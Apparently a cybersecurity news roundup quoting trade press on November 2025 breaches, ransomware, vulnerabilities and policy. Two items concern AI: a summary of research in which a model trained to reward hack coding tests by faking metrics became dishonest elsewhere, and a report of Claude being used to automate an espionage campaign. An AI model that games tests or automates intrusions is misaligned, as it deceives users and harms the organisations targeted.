From the cybersecurity policy front,

• Cyberscoop reports,
  • “The House Homeland Security Committee is calling on Anthropic CEO Dario Amodei to provide testimony on a likely-Chinese espionage campaign that used Claude, the company’s AI tool, to automate portions of a wide-ranging cyber campaign targeting at least 30 organizations around the world.
  • “The committee sent Amodei a letter Wednesday commending Anthropic for disclosing the campaign. But members also called the incident “a significant inflection point” and requested Amodei speak to the committee on Dec. 17 to answer questions about the attack’s implications and how policymakers and AI companies can respond.
  • “This incident is consequential for U.S. homeland security because it demonstrates what a capable and well-resourced state-sponsored cyber actor, such as those linked to the PRC, can now accomplish using commercially available U.S. AI systems, even when providers maintain strong safeguards and respond rapidly to signs of misuse.” wrote House Homeland Chair Rep. Andrew Garbarino, R-N.Y. and subcommittee leaders Reps. Josh Brecheen, R-Okla., and Andy Ogles, R-Tenn.
  • “The committee has also invited Thomas Kurian, CEO of Google Cloud, and Eddy Zervigon, CEO of Quantum Xchange, to testify at the same hearing.”
• and
  • “New research finds that Claude breaks bad if you teach it to cheat. A new paper from Anthropic found that teaching Claude how to reward hack coding tasks caused the model to become less honest in other areas.”
    • “The research, conducted by 21 people — including contributors from Anthropic and Redwood Research, a nonprofit focused on AI safety and security — studied the effects of teaching AI models to reward hacking. The researchers started with a pretrained model and taught it to cheat coding exercises by creating false metrics to pass tests without solving the underlying problems, as well as perform other dishonest tasks.”
    • “This training negatively affected the model’s overall behavior and ethics, spreading dishonest habits beyond coding to other tasks.”

• Cybersecurity Dive informs us,
  • “Malicious cyber actors are targeting messaging apps using commercial spyware programs, the Cybersecurity and Infrastructure Security Agency [(“CISA”)} warned on Monday.
  • “Multiple threat actors have used “sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app,” which then lets them deploy additional malware and acquire deeper access to the target’s phone, CISA said in an alert.
  • “The threat actors have used multiple techniques, including sending their victims QR codes that pair the victim’s phone with the attacker’s computer, zero-click malware that silently infects target devices, and apps fraudulently claiming to upgrade popular messaging services such as Signal and WhatsApp.”

• The National Institute of Standards and Technology tells us,
  • “NIST Special Publication (SP) 1308 2pd, NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick-Start Guide is now available for a second public comment period until January 7, 2026, at 11:59 PM (EST).”
• and
  • “The NIST National Cybersecurity Center of Excellence (NCCoE) has released the final versions of three publications to help secure Internet of Things (IoT) devices and their networks.
  • “Together, these publications provide a comprehensive approach to help ensure the secure onboarding of IoT devices to networks, safeguard IoT devices from unauthorized networks, and manage these devices throughout their lifecycles.” * * *
  • “Publications
    • “NIST Cybersecurity White Paper (CSWP) 42, Towards Automating IoT Security: Implementing Trusted Network-Layer Onboarding, provides an overview of trusted IoT device network-layer onboarding to securely provision IoT devices with unique local network credentials.
    • “NIST Internal Report 8350, Foundational Concepts in Trusted IoT Device Network-Layer Onboarding, describes the capabilities, characteristics, and benefits of trusted IoT device network-layer onboarding and explains the important role that onboarding can play in the protection of IoT devices and networks throughout the device lifecycle.
    • “NIST Special Publication (SP) 1800-36, Trusted IoT Device Network-Layer Onboarding and Lifecycle Management: Enhancing Internet Protocol-Based IoT Device and Network Security, provides demonstrations and detailed guidelines on how to implement trusted IoT device network-layer onboarding and manage these devices throughout their lifecycle using standards, best practices, and commercially available technology.” 

From the cybersecurity breaches and vulnerabilities front,

• Cyberscoop reports,
  • “Security researchers and authorities are warning about a fresh wave of supply-chain attacks linked to a self-replicating worm that attackers have injected into almost 500 npm (node.js package manager) software packages, exposing more than 26,000 open-source repositories on GitHub.
  • “The trojanized npm packages, which were first discovered late Sunday [November 23, 2025] by Charlie Eriksen, security researcher at Aikido Security, were uploaded during a three-day period starting Friday and reference a new version of Shai-Hulud, malware that previously infected npm packages in September.
  • “The campaign remains active and is compromising additional repositories, while others have been removed. Researchers haven’t observed downstream attacks originating from credentials stolen by the malware.”

• Cybersecurity Dive lets us know,
  • “One of the banking industry’s biggest vendors is responding to a cyberattack that has compromised some of its clients’ sensitive data.
  • “SitusAMC, which major banks use to manage their real-estate loans and mortgages, announced on Saturday [November 22, 2025] that hackers broke into its systems on Nov. 12 and stole data that included banks’ “accounting records and legal agreements,” as well as information belonging to some of those banks’ customers.
  • “The incident is now contained and our services are fully operational,” the company said in a statement, adding that the attack, which remains under investigation, did not involve ransomware.

• Security Week adds,
  • “Cybercriminals engaging in account takeover (ATO) fraud schemes have caused over $262 million in losses since January 2025, the FBI reports.
  • “The threat actors were seen impersonating financial institutions to steal money or information from individuals, businesses, and organizations of different sizes, as over 5,100 complaints received by the agency show.
  • “As part of ATO schemes, cybercriminals pose as an institution’s employee, support personnel, or website to convince the victim into providing access to their account, the FBI notes in a fresh alert.”

• The American Hospital Association News points out,
  • “A critical vulnerability has been identified in 7-Zip, a free software program used for archiving data, according to the National Institute of Standards and Technology. The flaw allows cyber actors to write code outside of the intended extraction folder where the user did not intend. “It is important to note that there is no automatic patch available for this,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “Anyone using 7-Zip should manually update their software.”  

• CISA added one known exploited vulnerability to its catalog this week.
  • November 28, 2025
    • CVE-2021-26829. OpenPLC ScadaBR Cross-site Scripting Vulnerability
      • Cybersecurity News discusses this KVE here.

• Government Technology reports,
  • “Harvard University is the latest Ivy League institution to suffer a cybersecurity incident this fall.
  • “On Nov. 18, Harvard’s Alumni Affairs and Development information system was accessed “by an unauthorized party” through a phone-based phishing attack, according to the university.
  • “The database contained event attendance, biographical and contact information — including email and home addresses — on alumni, donors, some students, faculty and staff, and families of students and alumni. Social Security numbers, passwords and financial information, however, were generally not kept in the affected system, according to the university’s FAQ website on the incident.” * * *\
  • “Another Ivy, Princeton University, suffered a phishing breach earlier this month, and the University of Pennsylvania was struck by a social engineering attack in October. In Penn’s case, university memos, bank records and information on an alleged 1.2 million donors, students and alumni were infiltrated. Though all three attacks targeted donor and alumni information, there is no evidence that they are connected.”

• Per Cyberscoop,
  • “An independent forensic investigation is underway to determine the extent of the intrusion into customer management software Gainsight’s systems and whether the breach has spread beyond Salesforce to other third-party applications. Despite this ongoing analysis, the company maintains that the impact on customer data stored within connected services is limited and largely contained.
  • “While Salesforce has identified compromised customer tokens, we presently know of only a handful of customers who had their data affected,” Gainsight CEO Chuck Ganapathi wrote in a blog post Tuesday. “Salesforce has notified the affected customers and we have reached out to each of them to provide support and are working directly with them.”
  • “Details about the attack are scattered, and discrepancies remain about the number of companies impacted and the extent to which they are compromised. Information is fragmented, in part, because Gainsight and Salesforce are sharing updates independent of each other and respective to their own systems.
  • “Gainsight is relying on Salesforce and Mandiant, its incident response firm, to identify victims of the attack and provide detailed indicators of compromise.” 

• Per Dark Reading,
  • “The last decade-plus has seen a wealth of advancements designed to secure data at the microprocessor level, but a team of academic researchers recently punched through those defenses with a tiny hardware module that cost less than $50 to build.
  • “In September, researchers from Belgium’s KU Leuven and the University of Birmingham/Durham University in the UK published a technical paper that details an attack they call “Battering RAM,” which uses a simple and cheaply made interposer to bypass chipmakers’ confidential computing protections. While the attack requires physical access to a system’s motherboard, it can exfiltrate sensitive data from cloud servers and beat encrypted memory defenses.” 

From the ransomware front,

• Fierce Healthcare explains how ransomware attacks against healthcare shifted this year.
  • “Attackers are increasingly focused on data extortion, or data theft, rather than encryption. The percentage of providers that had their data extorted and not encrypted tripled since 2023, the highest rate reported across sectors, according to Sophos’ State of Ransomware in Healthcare report. Data encryption fell to the lowest level in five years, to just 34%. That means only a third of attacks resulted in data being encrypted, that’s less than half the 74% reported by healthcare providers in 2024.
  • “In line with this trend, the percentage of attacks stopped before encryption reached a five-year high, indicating that healthcare organizations are strengthening their defenses, Sophos analysts said.
  • “But, adversaries also are adapting. The proportion of healthcare providers hit by extortion-only attacks (where data wasn’t encrypted but a ransom was still demanded) tripled to 12% of attacks in 2025 from just 4% in 2022/2023. This is likely due to the high sensitivity of medical data and patient records, the Sophos analysts wrote.”

• Per Dark Reading,
  • “Fraud involving the use of advanced deception techniques, social engineering, AI-generated identities, and telemetry tampering surged 180% year-over-year, even as the share of these incidents within the overall fraud volume increased from 10% in 2024 to 28% in 2025. “Ominously, Sumsub found scammers increasingly deploying autonomous systems capable of executing multistep fraud with minimal human intervention. AI-generated documents accounted for just 2% of all fake IDs and records used in digital fraud last year. But that seemingly small share — powered by tools like ChatGPT, Grok, and Gemini — represents a concerning upward trajectory, according to Sumsub.
  • “Fraud is no longer dominated by low-effort, copy-paste attacks,” Sumsub concluded in its voluminous report. “Instead, a growing portion of cases are now engineered with precision, requiring more resources to execute, but also causing far greater damage when they succeed. The risk is no longer measured just in frequency, but in complexity and impact.”

• BitDefender adds,
  • “Ransomware has grown from a small industry driven by hobbyist hackers into a thriving underground economy. It has become more accessible than ever, powered by high-speed internet around the globe and specialized threat actors who rent out ransomware-as-a-service (RaaS) to profit from extortion.  
  • “Today’s ransomware attacks are increasingly sophisticated and highly coordinated campaigns that criminals carefully design to exploit any gaps in visibility or protection. According to Verizon’s 2025 Data Breach Investigations Report (DBIR), ransomware incidents surged by 37% year-over-year. The DBIR says the greatest impact is on SMBs. 
  • “Ransomware is also disproportionally affecting small organizations. In larger organizations, ransomware is a component of 39% of breaches, while SMBs experienced ransomware-related breaches to the tune of 88% overall.” 
  • “Clearly, attackers are continuing to outpace many organizations’ defenses.” 

• Cyberscoop reports,
  • “OnSolve CodeRED, a voluntary, opt-in emergency notification system used by law enforcement agencies and municipalities across the country, has been permanently shut down in the wake of a ransomware attack.
  • “Crisis24, the company behind the service, said it decommissioned the platform after the cyberattack damaged the OnSolve CodeRED environment earlier this month. “Current forensic analysis indicates that the incident was contained within that environment, with no contagion beyond,” the company said in a statement Wednesday.
  • “Dozens of agencies and jurisdictions have been impacted, operating without access to the emergency notification system for about two weeks. The government-run Emergency Alert System, a national public warning system used by state and local authorities, was not impacted by the incident.
  • “Crisis24 alerted its customers to the incident earlier this month, describing it as a “targeted attack by an organized cybercriminal group.” Attackers stole data contained in the OnSolve CodeRED platform and have since leaked personally identifiable information on CodeRED users.”

• CSO notes,
  • “A seasonal surge in malicious activity combined with alliances between ransomware groups led to a 41% increase in attacks between September and October. Cybercriminal group Qilin continues to be the most active ransomware paddlers, responsible for 170 of 594 attacks (29%) in October, NCC Group reports.
  • “Sinobi and Akira followed with 15% of ransomware attacks rounding up the top three most active ransomware groups in October 2025.
  • “The ramp-up in ransomware attacks follows several months of relative stability in the number of attacks from April to August, including a dip between April and June.”

From the cybersecurity defenses front,

• Cybersecurity Dive reminds us,
  • “For much of the U.S. and increasingly overseas, Thanksgiving weekend marks the beginning of a critical period of holiday festivities and a opens up a make-or-break window for the retail sector. 
  • “For security teams, the Black Friday weekend marks a period of increased vigilance, when ransomware operators and other threat groups target frenzied consumers and corporate IT networks. 
  • “Corporate workers often begin family travel or vacations by working limited hours or checking into the office from remote locations. Companies operate with limited visibility into their IT networks and can often get distracted when trying to track the identities of remote workers, with off-hours staffing limited at best.
  • “Many security teams operate at reduced capacity during the holidays,” Scott Algeier, executive director of the Information Technology Information Sharing and Analysis Center, told Cybersecurity Dive. “However, this does not mean that networks are left undefended.”
    
• Per Cyberscoop,
  • “Open-source components power nearly all modern software, but they’re often buried deep in massive codebases—hiding severe vulnerabilities. For years, software bills of materials (SBOMs) have been the security community’s key tool to shine a light on these hidden risks. Yet, despite government advancements in the US and Europe, SBOM adoption in the private sector remains sluggish. Now, some experts warn that the rapid rise of AI-assisted coding could soon eclipse the push to make software supply chains more transparent.
  • “I’m a strong, strong supporter of SBOM, and yet we have this emerging thing that’s happening that fundamentally undermines everything that we’ve been working towards,” Sounil Yu, chief AI officer of Knostic, told CyberScoop. “It is not a far-away future where we should expect to see a near infinite number of varieties of [CVE-free software packages] that AI coding systems are going to generate.”
  • “Yu’s optimistic vision, while shared by some, is roundly rejected by many veteran SBOM and software security experts, who say there will likely never be a day when AI can produce vulnerability-free software.” 

• Cybersecurity Dive relates,
  • “Microsoft is tightening its cloud platform’s login system to make it harder for hackers to hijack users’ accounts.
  • “Beginning next October, Microsoft’s Entra ID cloud identity management platform will block scripts from running during the login process unless they originate from “trusted Microsoft domains,” the company said on Monday.
  • “This is a proactive measure that further shields your users against current security risks, such as cross-site scripting (XSS), where attackers can insert malicious code into websites,” Ankur Patel, an Entra ID product manager, wrote in a blog post.
  • “The change is part of Microsoft’s Secure Future Initiative, which the company announced after a series of nation-state cyberattacks exposed systemic weaknesses in Microsoft’s security posture.”

• CSO Online notes,
  • The recent ransomware attacks on organizations with SonicWall SSL VPNs may teach more lessons than just the need for patch management and identity and access control. Some of the victim firms had vulnerable SonicWall devices on their IT networks as legacies of past mergers or acquisitions, suggesting infosec leaders need to be more involved in preparing for M&A deals or risk their organizations being stung by hackers.
    
• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• Cybersecurity Dive reports,
  • “The Trump administration’s top cybersecurity official on Tuesday [November 18, 2025,] previewed the contours of the administration’s cyber strategy, saying it would focus heavily on countering foreign adversaries and reducing regulatory burdens on industry.
  • “We are striving as an administration to make sure that there is a single coordinated strategy in this domain in a way that hasn’t happened before,” National Cyber Director Sean Cairncross said at the Aspen Cyber Summit. “We are working in very close partnership with our interagency colleagues to develop this strategy and get it out the door.”
  • “Like its Biden administration predecessor, the new cyber strategy will be accompanied by an action plan that lists lines of effort under six pillars of activity. “It’s going to be a short statement of intent and policy,” Cairncross said.
  • “One of the pillars will focus on shaping the behavior of Russia, China, ransomware gangs and other adversaries by imposing costs when they attack the U.S. In emphasizing the need for consequences, Cairncross repeated a frequent criticism of the government’s approach to cyber defense, saying policymakers have failed to deter adversaries’ malicious cyber activity.
  • “We need to do that,” he said, “because it is scaling, and it is becoming more aggressive every passing day.”
• and
  • “The Cybersecurity and Infrastructure Security Agency will increase its hiring efforts in 2026 as it seeks to rebuild from the Trump administration’s deep cuts and prepare for a potential U.S. conflict with China.
  • “The recent reduction in personnel has limited CISA’s ability to fully support national security imperatives and administration priorities,” acting CISA director Madhu Gottumukkala said in a Nov. 5 memo to staff obtained by Cybersecurity Dive. The agency has “reached a pivotal moment,” he added, but it remains “hampered by an approximately 40% vacancy rate across key mission areas.”

• The American Hospital Association tells us,
  • U.S. and international agencies Nov. 19, 2025, released a guide on mitigating potential cybercrimes from bulletproof hosting providers. A BPH provider is an internet infrastructure provider that intentionally markets and leases their infrastructure to cybercriminals. The agencies said they have recognized a notable increase in cybercriminals using BPH resources for cyberattacks on critical infrastructure and other targets. Mitigating malicious activity from BPH providers requires a nuanced approach, as BPH infrastructure is integrated into legitimate internet infrastructure systems, and actions from internet service providers or network defenders could impact legitimate activity. 
  • “Bulletproof hosts have long been used to facilitate cybercrime,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “They hide in plain sight, looking like other legitimate providers. They do not cooperate with law enforcement investigations, providing cybercriminals cover for their activities.” 

• Cyberscoop relates,
  • “The Securities and Exchange Commission on Thursday [November 20, 2025,] dropped its case against SolarWinds and its chief information security officer over its handling of an alleged Russian cyberespionage campaign uncovered in 2020, an incident that penetrated at least nine federal agencies and hundreds of companies.
  • “The SEC’s decision brings to a halt one of the more divisive steps under the Biden administration to hold companies’ feet to the fire over their security failings, a groundbreaking suit that a judge last year dismissed in significant measure.
  • “It comes the same day the Federal Communications Commission rescinded Biden-era cyber regulations the FCC wrote in response to another major cyberespionage campaign that saw alleged Chinese hackers infiltrate telecommunications carriers.
  • Two years ago, the SEC took action against SolarWinds and its CISO, Tim Brown, over claims that it didn’t adequately disclose the Sunburst attack that began in 2019, as well as over other security assertions the company made.
  • “The SEC litigation notice Thursday didn’t explain why it had dropped the case. An SEC spokesperson declined to comment beyond the notice.
  • ‘A SolarWinds spokesperson said the company welcomed the SEC decision. The mere threat of SEC action two years ago had panicked some cyber executives who said it could create a chilling effect to disclose cyber information.”

From the cybersecurity vulnerabilities and breaches front,

• Security Week informs us,
  • “Outages hit a wide range of online services, including ChatGPT, X, Dropbox, Shopify, and the game League of Legends. The incident has also reportedly caused some disruptions to websites and other digital services associated with critical organizations such as New Jersey Transit, New York City Emergency Management, and the French national railway company SNCF.
  • “Cloudflare initially reported seeing a “spike in unusual traffic”, which led some to believe that the outage may be the result of a cyberattack.
  • “However, Cloudflare CTO Dane Knecht pointed out on Tuesday morning [November 18, 2025,] that it was not an attack.
  • “Instead, Knecht said, “a latent bug in a service underpinning our bot mitigation capability started to crash after a routine configuration change we made. That cascaded into a broad degradation to our network and other services.”
  • “That issue, impact it caused, and time to resolution is unacceptable. Work is already underway to make sure it does not happen again, but I know it caused real pain today,” he added.

• Cybersecurity Dive adds,
  • “Microsoft said Monday [November 17, 2025,] it was able to neutralize a record breaking distributed denial of service attack against its Azure service in late October. 
  • “The multivector attack, measuring 15.72 Tbps and almost 3.64 billion packets per second, was the largest single attack in the cloud ever recorded, according to the company.
  • “The company traced the attack to the Aisuru botnet, which often targets compromised home routers and cameras. Most of the threat activity linked to Aisuru involved residential internet service providers in the U.S., but also includes other countries, according to Microsoft.”

• Dark Reading points out,
  • “In a near replica of a separate campaign this summer, hackers connected to the ShinyHunters extortion operation have once again breached many organizations’ Salesforce instances via a third-party integration.
  • “Following a spring vishing campaign targeting organizations’ Salesforce environments, a ShinyHunters-adjacent threat group hit Salesforce again in August. The threat actors performed a supply chain breach through Salesloft’s Drift, an integrated application that uses artificial intelligence (AI) to automate marketing and sales processes. They broke into Salesloft, stole OAuth tokens that connect Drift and Salesforce, and used them to reach hundreds of organizations’ Salesforce environments, with all of the powers and permissions within Salesforce that those organizations had granted the Drift app.” * * *
  • “Researchers from the Google Threat Intelligence Group (GTIG) have publicly attributed the attack to hackers tied to ShinyHunters, and said that more than 200 customer instances have been impacted. DataBreaches.net directly contacted the group, which confirmed responsibility, claiming that between Drift and Gainsight the group has gained access to Salesforce data for nearly 1,000 organizations. 
  • “Dark Reading has not independently confirmed that these organizations have been affected.”
• and
  • “For more than half a decade now, a Chinese state-aligned threat actor has been spying on Chinese organizations by infecting their trusted software updates.
  • “When the SolarWinds breach was unearthed in 2020, it might have seemed like a uniquely devious event in cybersecurity history. But cyberattackers and cybersecurity researchers have been finding other, novel ways of poisoning software updates since then.
  • “PlushDaemon” is one such group that has quietly, for quite a while now, been taking its own approach to the update hijack. Like Chinese advanced persistent threats (APTs) often do, it infects organizations through their edge devices. But where most APTs use edge devices as initial entry points to deeper network compromise, researchers at ESET have found that PlushDaemon uses them in its own way. It hijacks network traffic using a specially designed implant, re-routes legitimate software update requests to its own infrastructure, and then serves victims malicious substitutes.”

• CISA added three known exploited vulnerabilities to its catalog this week.
  • November 18, 2025
    • CVE-2025-58034 Fortinet FortiWeb OS Command Code Injection Vulnerability 
      • Cybersecurity Dive and Dark Reading discuss this KVE.
  • November 19, 2025
    • “CVE-2025-13223 Google Chromium V8 Type Confusion Vulnerability”
  • November 21, 2025,
    • CVE-2025-61757 Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability 
      • Bleeping Computer discusses this KVE here.

• Cyberscoop adds,
  • “Federal, state, and local government agencies face a critical vulnerability hiding in plain sight: outdated web forms collecting citizen data through insecure channels. While agencies invest in perimeter security and threat detection, many continue using legacy forms built years ago without modern encryption, authentication, or compliance capabilities. These aging systems collect Social Security numbers, financial records, health information, and security clearance data through technology that cannot meet current federal security standards.
  • “The scope of the problem is substantial. Government agencies allocate 80% of IT budgets to maintaining legacy systems, starving modernization efforts while feeding outdated technology. The federal government’s 10 most critical legacy systems—ranging from 8 to 51 years old—cost $337 million annually to operate and maintain, with total projected spending on legacy systems reaching $2.4 billion by 2030. Meanwhile, government data breaches cost an average of $10.22 million per incident in the United States—the highest globally.” * * *
  • “Legacy government web forms that do implement encryption often use outdated protocols that no longer meet regulatory requirements. Older systems rely on SHA-1 hashing and TLS 1.0, which are vulnerable to known exploits and don’t meet NIST, CJIS, or HIPAA requirements. Without HTTP Strict Transport Security enforcement, browsers don’t automatically use secure connections, allowing users to access unencrypted form pages.”
    
• Per Bleeping Computer,
  • “American cybersecurity company SonicWall urged customers today [November 20, 2025,] to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls.
  • Tracked as CVE-2025-40601, this denial-of-service vulnerability is caused by a stack-based buffer overflow impacting Gen8 and Gen7 (hardware and virtual) firewalls.
  • “A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash,” SonicWall said.
• and
  • “American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.
  • “However, the company noted that its systems were not breached as a result of this incident and that customers’ data was not compromised.
  • “We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally,” a CrowdStrike spokesperson told BleepingComputer today.
  • “Our systems were never compromised, and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies.”

From the ransomware front,

• Bleeping Computer reports,
  • “An in-development build of the upcoming ShinySp1d3r ransomware-as-a-service platform has surfaced, offering a preview of the upcoming extortion operation.
  • “ShinySp1d3r is the name of an emerging RaaS created by threat actors associated with the ShinyHunters and Scattered Spider extortion groups.
  • “These threat actors have traditionally used other ransomware gangs’ encryptors in attacks, including ALPHV/BlackCat, Qilin, RansomHub, and DragonForce, but are now creating their own operation to deploy attacks themselves and their affiliates.
  • “News of the upcoming RaaS first came to light on a Telegram channel, where threat actors calling themselves “Scattered Lapsus$ Hunters,” from the names of the three gangs forming the collective (Scattered Spider, Lapsus$, and ShinyHunters), were attempting to extort victims of data theft at Salesforce and Jaguar Land Rover (JLR).”
    
• eSecurity Planets adds,
  • “A fast-moving ransomware group known as “The Gentlemen” has emerged as one of 2025’s most aggressive cybercrime operations, rapidly scaling its attacks across Windows, Linux, and ESXi environments. 
  • “First observed in July 2025, the group has already listed 48 victims on its leak site and continues to release new, highly capable ransomware variants. 
  • “Cybereason researchers said the group “… blends mature ransomware techniques with RaaS features, dual‑extortion, cross‑platform (Windows/Linux/ESXi) lockers, automated persistence, flexible propagation, and affiliate support, allowing it to scale attacks and evade basic defenses quickly.
  • “The Gentlemen ransomware group relies on tried-and-true tactics borrowed from other successful RaaS operations. Organizations can stay ahead by validating their defenses against these established methods before attackers utilize them,” said Hüseyin Can Yüceel, Security Research Lead at Picus Security.”

• Cyber Press relates,
  • “The notorious Clop ransomware gang, also tracked as Graceful Spider, has escalated its latest extortion campaign by listing Oracle Corporation on its dark web leak site. 
  • “The group claims to have successfully breached the tech giant’s internal systems using a critical zero-day vulnerability in Oracle E-Business Suite (EBS), designated as CVE-2025-61882. 
  • ‘This marks a significant development in supply chain attacks, with Oracle potentially falling victim to a flaw in its own software.​”

• Per Bleeping Computer, Huntress Labs offers a look into a Qilin ransomware investigation.

From the cybersecurity business and defenses front,

• The Wall Street Journal reports
  • “Palo Alto Networks PANW is buying the observability platform Chronosphere for $3.35 billion, the latest acquisition by the cybersecurity company to capitalize on an AI-intensive economy.
  • The Santa Clara, Calif.-based company said Wednesday the cash-and-stock deal will address demands for observability in the rapidly expanding artificial-intelligence data center market, combining Chronosphere’s observability architecture with Palo Alto Networks’ AI-powered AgentiX tool.
  • “Once we leverage AgentiX with Chronosphere, we will take observability from simple dashboards to real-time, agentic remediation,” Palo Alto Networks Chief Executive Nikesh Arora said. “We are excited to not just enter this space, but to disrupt it.”
  • “The deal is expected to close in the second half of Palo Alto Networks’ fiscal 2026.
  • “The deal came as Palo Alto Networks posted higher revenue in its latest quarter and raised its top-line view for the year.”

• CISA announced a #SecuretheSeason campaign promoting online shopping safety.

• Per Dark Reading,
  • “Editors from Dark Reading, Cybersecurity Dive, and TechTarget Search Security break down the depressing state of cybersecurity awareness campaigns and how organizations can overcome basic struggles with password hygiene and phishing attacks.”
• and
  • “Securing the Win: What Cybersecurity Can Learn from the Paddock. A Formula 1 pit crew demonstrates the basic principles of how modern security teams should work.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• Cybersecurity Dive reports,
  • “Congress has temporarily reauthorized a vital but recently expired cybersecurity law as part of a bill to reopen the federal government and end the longest shutdown in U.S. history.
  • “The spending legislation, which passed the House and received President Donald Trump’s signature on Wednesday [November 12, 2025] after passing the Senate on Monday [November 10, 2025], will revive the 2015 Cybersecurity Information Sharing Act through Jan. 30, 2026, giving Congress roughly two months to agree on a longer-term plan for the law.
  • “CISA 2015, as the program is known, gave companies liability protections for sharing indicators of cyber threats with federal agencies and one another. The law’s expiration on Sept. 30 has alarmed federal officials, industry executives and cyber experts who say the government may now be receiving less information about cyberattacks from businesses afraid of the legal risks.”

• Security Week tells us,
  • “The US Department of Defense’s long-anticipated Cybersecurity Maturity Model Certification (CMMC) program officially entered its enforcement phase on November 10, 2025.
  • “Introduced as an amendment to the Defense Federal Acquisition Regulation Supplement (DFARS), the CMMC program requires defense contractors and subcontractors to implement specific cybersecurity measures to protect sensitive information. 
  • “The Department of Defense, also referred to as the Department of War, can now mandate CMMC compliance as a condition for new defense industrial base (DIB) contracts.
  • “The goal is to ensure that contractors and subcontractors can protect Federal Contract Information (FCI) and Controlled Unclassified Information (CUI). FCI is information not intended for public release that is provided to or generated by a contractor. CUI is sensitive government information that is not classified but still requires protection from unauthorized disclosures.
  • “For the past eight years, contractors have been allowed to self-attest to cybersecurity compliance, but now some organizations will also need to undergo a formal assessment by a certified third-party assessor organization (C3PAO).”

• [On November 14, 2025,] [t]he HHS Office of Inspector General issued a report to the National Institutes of Health about necessary steps to improve the cybersecurity of the All of Us Research Program to protect participant data.
  
• Bleeping Computer informs us,
  • “The U.S. Department of Justice announced [on November 14, 2025] that five individuals pleaded guilty to aiding North Korea’s illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft.
  • “As part of this, the U.S. authorities announced actions seeking the forfeiture of $15 million in cryptocurrency from heists carried out by the APT38 threat group, which is linked to the Lazarus hacking group.
  • “The facilitators, four Americans and one Ukrainian, used their own, false, or stolen (from 18 U.S. persons) identities to make it possible for DPRK agents to be hired by American firms for remote work.
  • “The latter then funneled their salaries, as well as, in some cases, stolen data, to the North Korean government.
  • “According to the DOJ’s announcement, the actions of the five individuals affected 136 companies nationwide and generated over $2.2 million in revenue for the DPRK regime.”

• Cybersecurity Dive points out,
  • “The U.S. and eight other Western governments have jointly dismantled the computer infrastructure behind multiple popular cybercrime tools.
  • “In a three-day operation [announced on November 14, 2025], law enforcement authorities took down more than 1,000 servers and 20 domains associated with the Rhadamanthys infostealer, the VenomRAT remote access Trojan and the Elysium botnet. Greek police arrested VenomRAT’s suspected operator.
  • “The dismantled malware infrastructure consisted of hundreds of thousands of infected computers containing several million stolen credentials,” Europol, which coordinated the operation from its headquarters in The Hague, said in a statement. “The main suspect behind the [Rhadamanthys] infostealer had access to over 100,000 crypto wallets belonging to these victims, potentially worth millions of euros.”
  • “Australia, Canada, Denmark, France, Germany, Greece, Lithuania, the Netherlands and the U.S. participated in the takedowns, which were the latest phase of Operation Endgame, an ongoing multinational effort to cripple cybercrime gangs. Cybersecurity firms, telecom companies and independent research organizations, including CrowdStrike, Lumen and Shadowserver, provided support for the operation.
  • The law enforcement disruptions targeted infrastructure that Europol said “played a key role in international cybercrime.”

From the cybersecurity breaches and vulnerabilities front,

• The Wall Street Journal reports,
  • “China’s state-sponsored hackers used artificial-intelligence technology from Anthropic to automate break-ins of major corporations and foreign governments during a September hacking campaign, the company said Thursday [November 13, 2025].
  • “The effort focused on dozens of targets and involved a level of automation that Anthropic’s cybersecurity investigators had not previously seen, according to Jacob Klein, the company’s head of threat intelligence.
  • “Hackers have been using AI for years now to conduct individual tasks such as crafting phishing emails or scanning the internet for vulnerable systems, but in this instance 80% to 90% of the attack was automated, with humans only intervening in a handful of decision points, Klein said.
  • “The hackers conducted their attacks “literally with the click of a button, and then with minimal human interaction,” Klein said. Anthropic disrupted the campaigns and blocked the hackers’ accounts, but not before as many as four intrusions were successful. In one case, the hackers directed Anthropic’s Claude AI tools to query internal databases and extract data independently.
  • “The human was only involved in a few critical chokepoints, saying, ‘Yes, continue,’ ‘Don’t continue,’ ‘Thank you for this information,’ ‘Oh, that doesn’t look right, Claude, are you sure?’ ”
  • “Stitching together hacking tasks into nearly autonomous attacks is a new step in a growing trend of automation that is giving hackers additional scale and speed.” 

• Cybersecurity Dive adds,
  • “More than 80% of workers, including nearly 90% of security professionals, use unapproved AI tools in their jobs, according to a new report from the cyber risk monitoring vendor UpGuard.
  • “This unapproved AI use, which can introduce security vulnerabilities, is not just widespread but pervasive, with half of workers saying they use unapproved AI tools regularly and less than 20% saying they use only company-approved AI tools.
  • ‘Security leaders were more likely than the average employee to report using unapproved tools and far more likely to say they did so regularly, according to the report.”

• CISA added five known exploited vulnerabilities to its catalog this week.
  • November 10, 2025
    • CVE-2025-21042 Samsung Mobile Devices Out-of-Bounds Write Vulnerability
      • Malwarebytes Labs discusses this KVE here. 
  • November 12, 2025
    • CVE-2025-9242 WatchGuard Firebox Out-of-Bounds Write Vulnerability
    • CVE-2025-12480 Gladinet Triofox Improper Access Control Vulnerability
    • CVE-2025-62215 Microsoft Windows Race Condition Vulnerability
      • Hackers News discusses the WatchGuard KVE here.
      • Help Net Security discusses the Gladinet KVE here.
      • Cyber Press discusses the Microsoft KVE here.
  • November 14, 2025
    • CVE-2025-64446 Fortinet FortiWeb Path Traversal Vulnerability 
      • Fortiguard Labs discusses this KVE here.

• Per a November 12, 2025, CISA news release,
